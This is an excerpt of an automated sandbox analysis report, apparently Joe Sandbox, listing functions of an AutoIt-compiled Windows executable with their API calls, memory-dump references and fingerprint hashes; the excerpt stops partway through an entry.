                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A92F00
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00A92F09
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                        • Opcode ID: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                                                                                                                                                        • Instruction ID: 5ecc28c692c381f4bd654aa5ee1012fc29b68803d825031f8825a540bed6b18e
                                                                                                                                                        • Opcode Fuzzy Hash: b5ecc6f07425ed8e0e42a94e4f85ec5d04eccea39220e9190d8e426dc8b72b09
                                                                                                                                                        • Instruction Fuzzy Hash: B5F0D0715403D07AD731975B6C48F672E7ED7CBF11B05455EBA08931F0C9610895DAB0
                                                                                                                                                        Function 00AD6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AD6DC5
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                                                                                                                                                        • _wcsrchr.LIBCMT ref: 00AD6DFB
                                                                                                                                                          • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6E31
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3633006590-0
                                                                                                                                                        • Opcode ID: 50a051a8a8729ae1a7c2462bbff9844cf4f91f8d9116329c12e59f9aee196587
                                                                                                                                                        • Instruction ID: 05d2b7f848171ea52005fdeee00729656664aa689b5bc6dfea293196898d9367
                                                                                                                                                        • Opcode Fuzzy Hash: 50a051a8a8729ae1a7c2462bbff9844cf4f91f8d9116329c12e59f9aee196587
                                                                                                                                                        • Instruction Fuzzy Hash: BC2136756003189ADF20BBB8FD4AAEA33ACCF01310F600657E062C32D3EF20DE848A50
                                                                                                                                                        Function 00AE9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AEACD3: inet_addr.WS2_32(00000000), ref: 00AEACF5
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00AE9160
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE916F
                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 00AE918B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3701255441-0
                                                                                                                                                        • Opcode ID: 095777f6cd7181f5b7f67bfeb120d15ce4c5803a395bf076ae36f9266bac7ab7
                                                                                                                                                        • Instruction ID: fd92ef4608e0e86487e1346cdbbeda68e9af25ef30945ba8d1acc1e9cef51aab
                                                                                                                                                        • Opcode Fuzzy Hash: 095777f6cd7181f5b7f67bfeb120d15ce4c5803a395bf076ae36f9266bac7ab7
                                                                                                                                                        • Instruction Fuzzy Hash: 32219D313006119FDB00AF68CD89BAE77E9EF89724F048559F916AB3D2DB74EC418B51
                                                                                                                                                        Function 00A93DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                                                                                                                                                        • _free.LIBCMT ref: 00B03C27
                                                                                                                                                        • _free.LIBCMT ref: 00B03C6E
                                                                                                                                                          • Part of subcall function 00A9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                                                                                                                                                          • Part of subcall function 00A9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                                                                                                                                                          • Part of subcall function 00A9BDF0: __wsplitpath.LIBCMT ref: 00A9BF19
                                                                                                                                                          • Part of subcall function 00A9BDF0: _wcscpy.LIBCMT ref: 00A9BF31
                                                                                                                                                          • Part of subcall function 00A9BDF0: _wcscat.LIBCMT ref: 00A9BF46
                                                                                                                                                          • Part of subcall function 00A9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                        • API String ID: 1510338132-1757145024
                                                                                                                                                        • Opcode ID: 83b54c733c8fb520efc13ff8c7f58021d4ca0abdb9a3deaeb1ebbcf9ea3827be
                                                                                                                                                        • Instruction ID: cfc806eab940feaebf4d9612d7798cca6d19496747a398e12df7e08328639063
                                                                                                                                                        • Opcode Fuzzy Hash: 83b54c733c8fb520efc13ff8c7f58021d4ca0abdb9a3deaeb1ebbcf9ea3827be
                                                                                                                                                        • Instruction Fuzzy Hash: 1E917F71A10219AFCF04EFA4DD959EEBBF8FF19710F14446AF416AB291DB349A04CB50
                                                                                                                                                        Function 00AB413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __getstream.LIBCMT ref: 00AB418E
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00AB41C9
                                                                                                                                                        • __wopenfile.LIBCMT ref: 00AB41D9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                        • String ID: <G
                                                                                                                                                        • API String ID: 1820251861-2138716496
                                                                                                                                                        • Opcode ID: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                                                                                                                                                        • Instruction ID: 88a9b229bd54ac49604c7f803ea5b6bd02b002a3400feebc9bb07f4a7202b550
                                                                                                                                                        • Opcode Fuzzy Hash: cb06f92078b760ab2855e06efca9dd1be83bea1344fdfef81aa41ff330dd331c
                                                                                                                                                        • Instruction Fuzzy Hash: 03110A70D002169FDB10BFBC9D426EF37FCAF58390B148625A815DB283EB74C981A761
                                                                                                                                                        Function 00AAC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AAC948,SwapMouseButtons,00000004,?), ref: 00AAC979
                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC99A
                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00AAC948,SwapMouseButtons,00000004,?,?,?,?,00AABF22), ref: 00AAC9BC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                        • Opcode ID: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                                                                                                                                                        • Instruction ID: c38d93e10fd6692563cf4cb55a74a9c81aa4eb21c628d8f0411b76afe17ce69f
                                                                                                                                                        • Opcode Fuzzy Hash: c9c551042e4bcb3ab9e00ca4d9be9fdbd48284780cbf8f1cd532a5dc077fab90
                                                                                                                                                        • Instruction Fuzzy Hash: 52117C75511208FFEB128F64DC44EEF7BB8EF09750F00841AB841E7250D7319E409B60
                                                                                                                                                        Function 00ACA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                                                                                                                                                        • Instruction ID: f3fa42ce0f739344cd6c00ea0a8a83912b2206d6cc52873a73a6019ba41613c1
                                                                                                                                                        • Opcode Fuzzy Hash: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                                                                                                                                                        • Instruction Fuzzy Hash: 17C14975A0021AEBCB14CFA4C984FBEB7B5FF58708F118599E912AB251D730DE41CBA1
                                                                                                                                                        Function 00ADCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        • _free.LIBCMT ref: 00ADCDC9
                                                                                                                                                        • _free.LIBCMT ref: 00ADCDD0
                                                                                                                                                        • _free.LIBCMT ref: 00ADCE3B
                                                                                                                                                          • Part of subcall function 00AB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28DE
                                                                                                                                                          • Part of subcall function 00AB28CA: GetLastError.KERNEL32(00000000,?,00AB8715,00000000,00AB88A3,00AB4673,?), ref: 00AB28F0
                                                                                                                                                        • _free.LIBCMT ref: 00ADCE43
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                        • Instruction ID: 74006ccdececbb7277ea31d4b5f23da708f6cb3c6deee2c81bce5df0e1969cbe
                                                                                                                                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                                                        • Instruction Fuzzy Hash: 15513EB1A04219AFDF159F64CC81BAEB7B9EF48310F1040AEF659A3251DB715A80CF59
                                                                                                                                                        Function 00A91E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00A91E87
                                                                                                                                                          • Part of subcall function 00A938E4: _memset.LIBCMT ref: 00A93965
                                                                                                                                                          • Part of subcall function 00A938E4: _wcscpy.LIBCMT ref: 00A939B5
                                                                                                                                                          • Part of subcall function 00A938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00A91EDC
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A91EEB
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B04526
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                                        • Opcode ID: 8f5974af4c5a97498afb4f80eef948afc2e449472cc645dac55bbe2486e54ad8
                                                                                                                                                        • Instruction ID: e5ce5b3498c5891251d2a6cae2051be88190da6b6565c87134ab2cc09bdfd0bc
                                                                                                                                                        • Opcode Fuzzy Hash: 8f5974af4c5a97498afb4f80eef948afc2e449472cc645dac55bbe2486e54ad8
                                                                                                                                                        • Instruction Fuzzy Hash: 4F21D7B1504794AFEB3287248C55BEBBFEC9B12308F0404CDE79E57281C7745A84CB51
                                                                                                                                                        Function 00AE92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00AE92F0
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE92FB
                                                                                                                                                        • _memmove.LIBCMT ref: 00AE9328
                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 00AE9333
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1504782959-0
                                                                                                                                                        • Opcode ID: e0aba6f5deae09f213a23417450328de1459d45638e9d8c45afea71c4bc1a0b3
                                                                                                                                                        • Instruction ID: 901c725e4d550f5df8075337626d740bf923dc676a59442e93d15d098a937a25
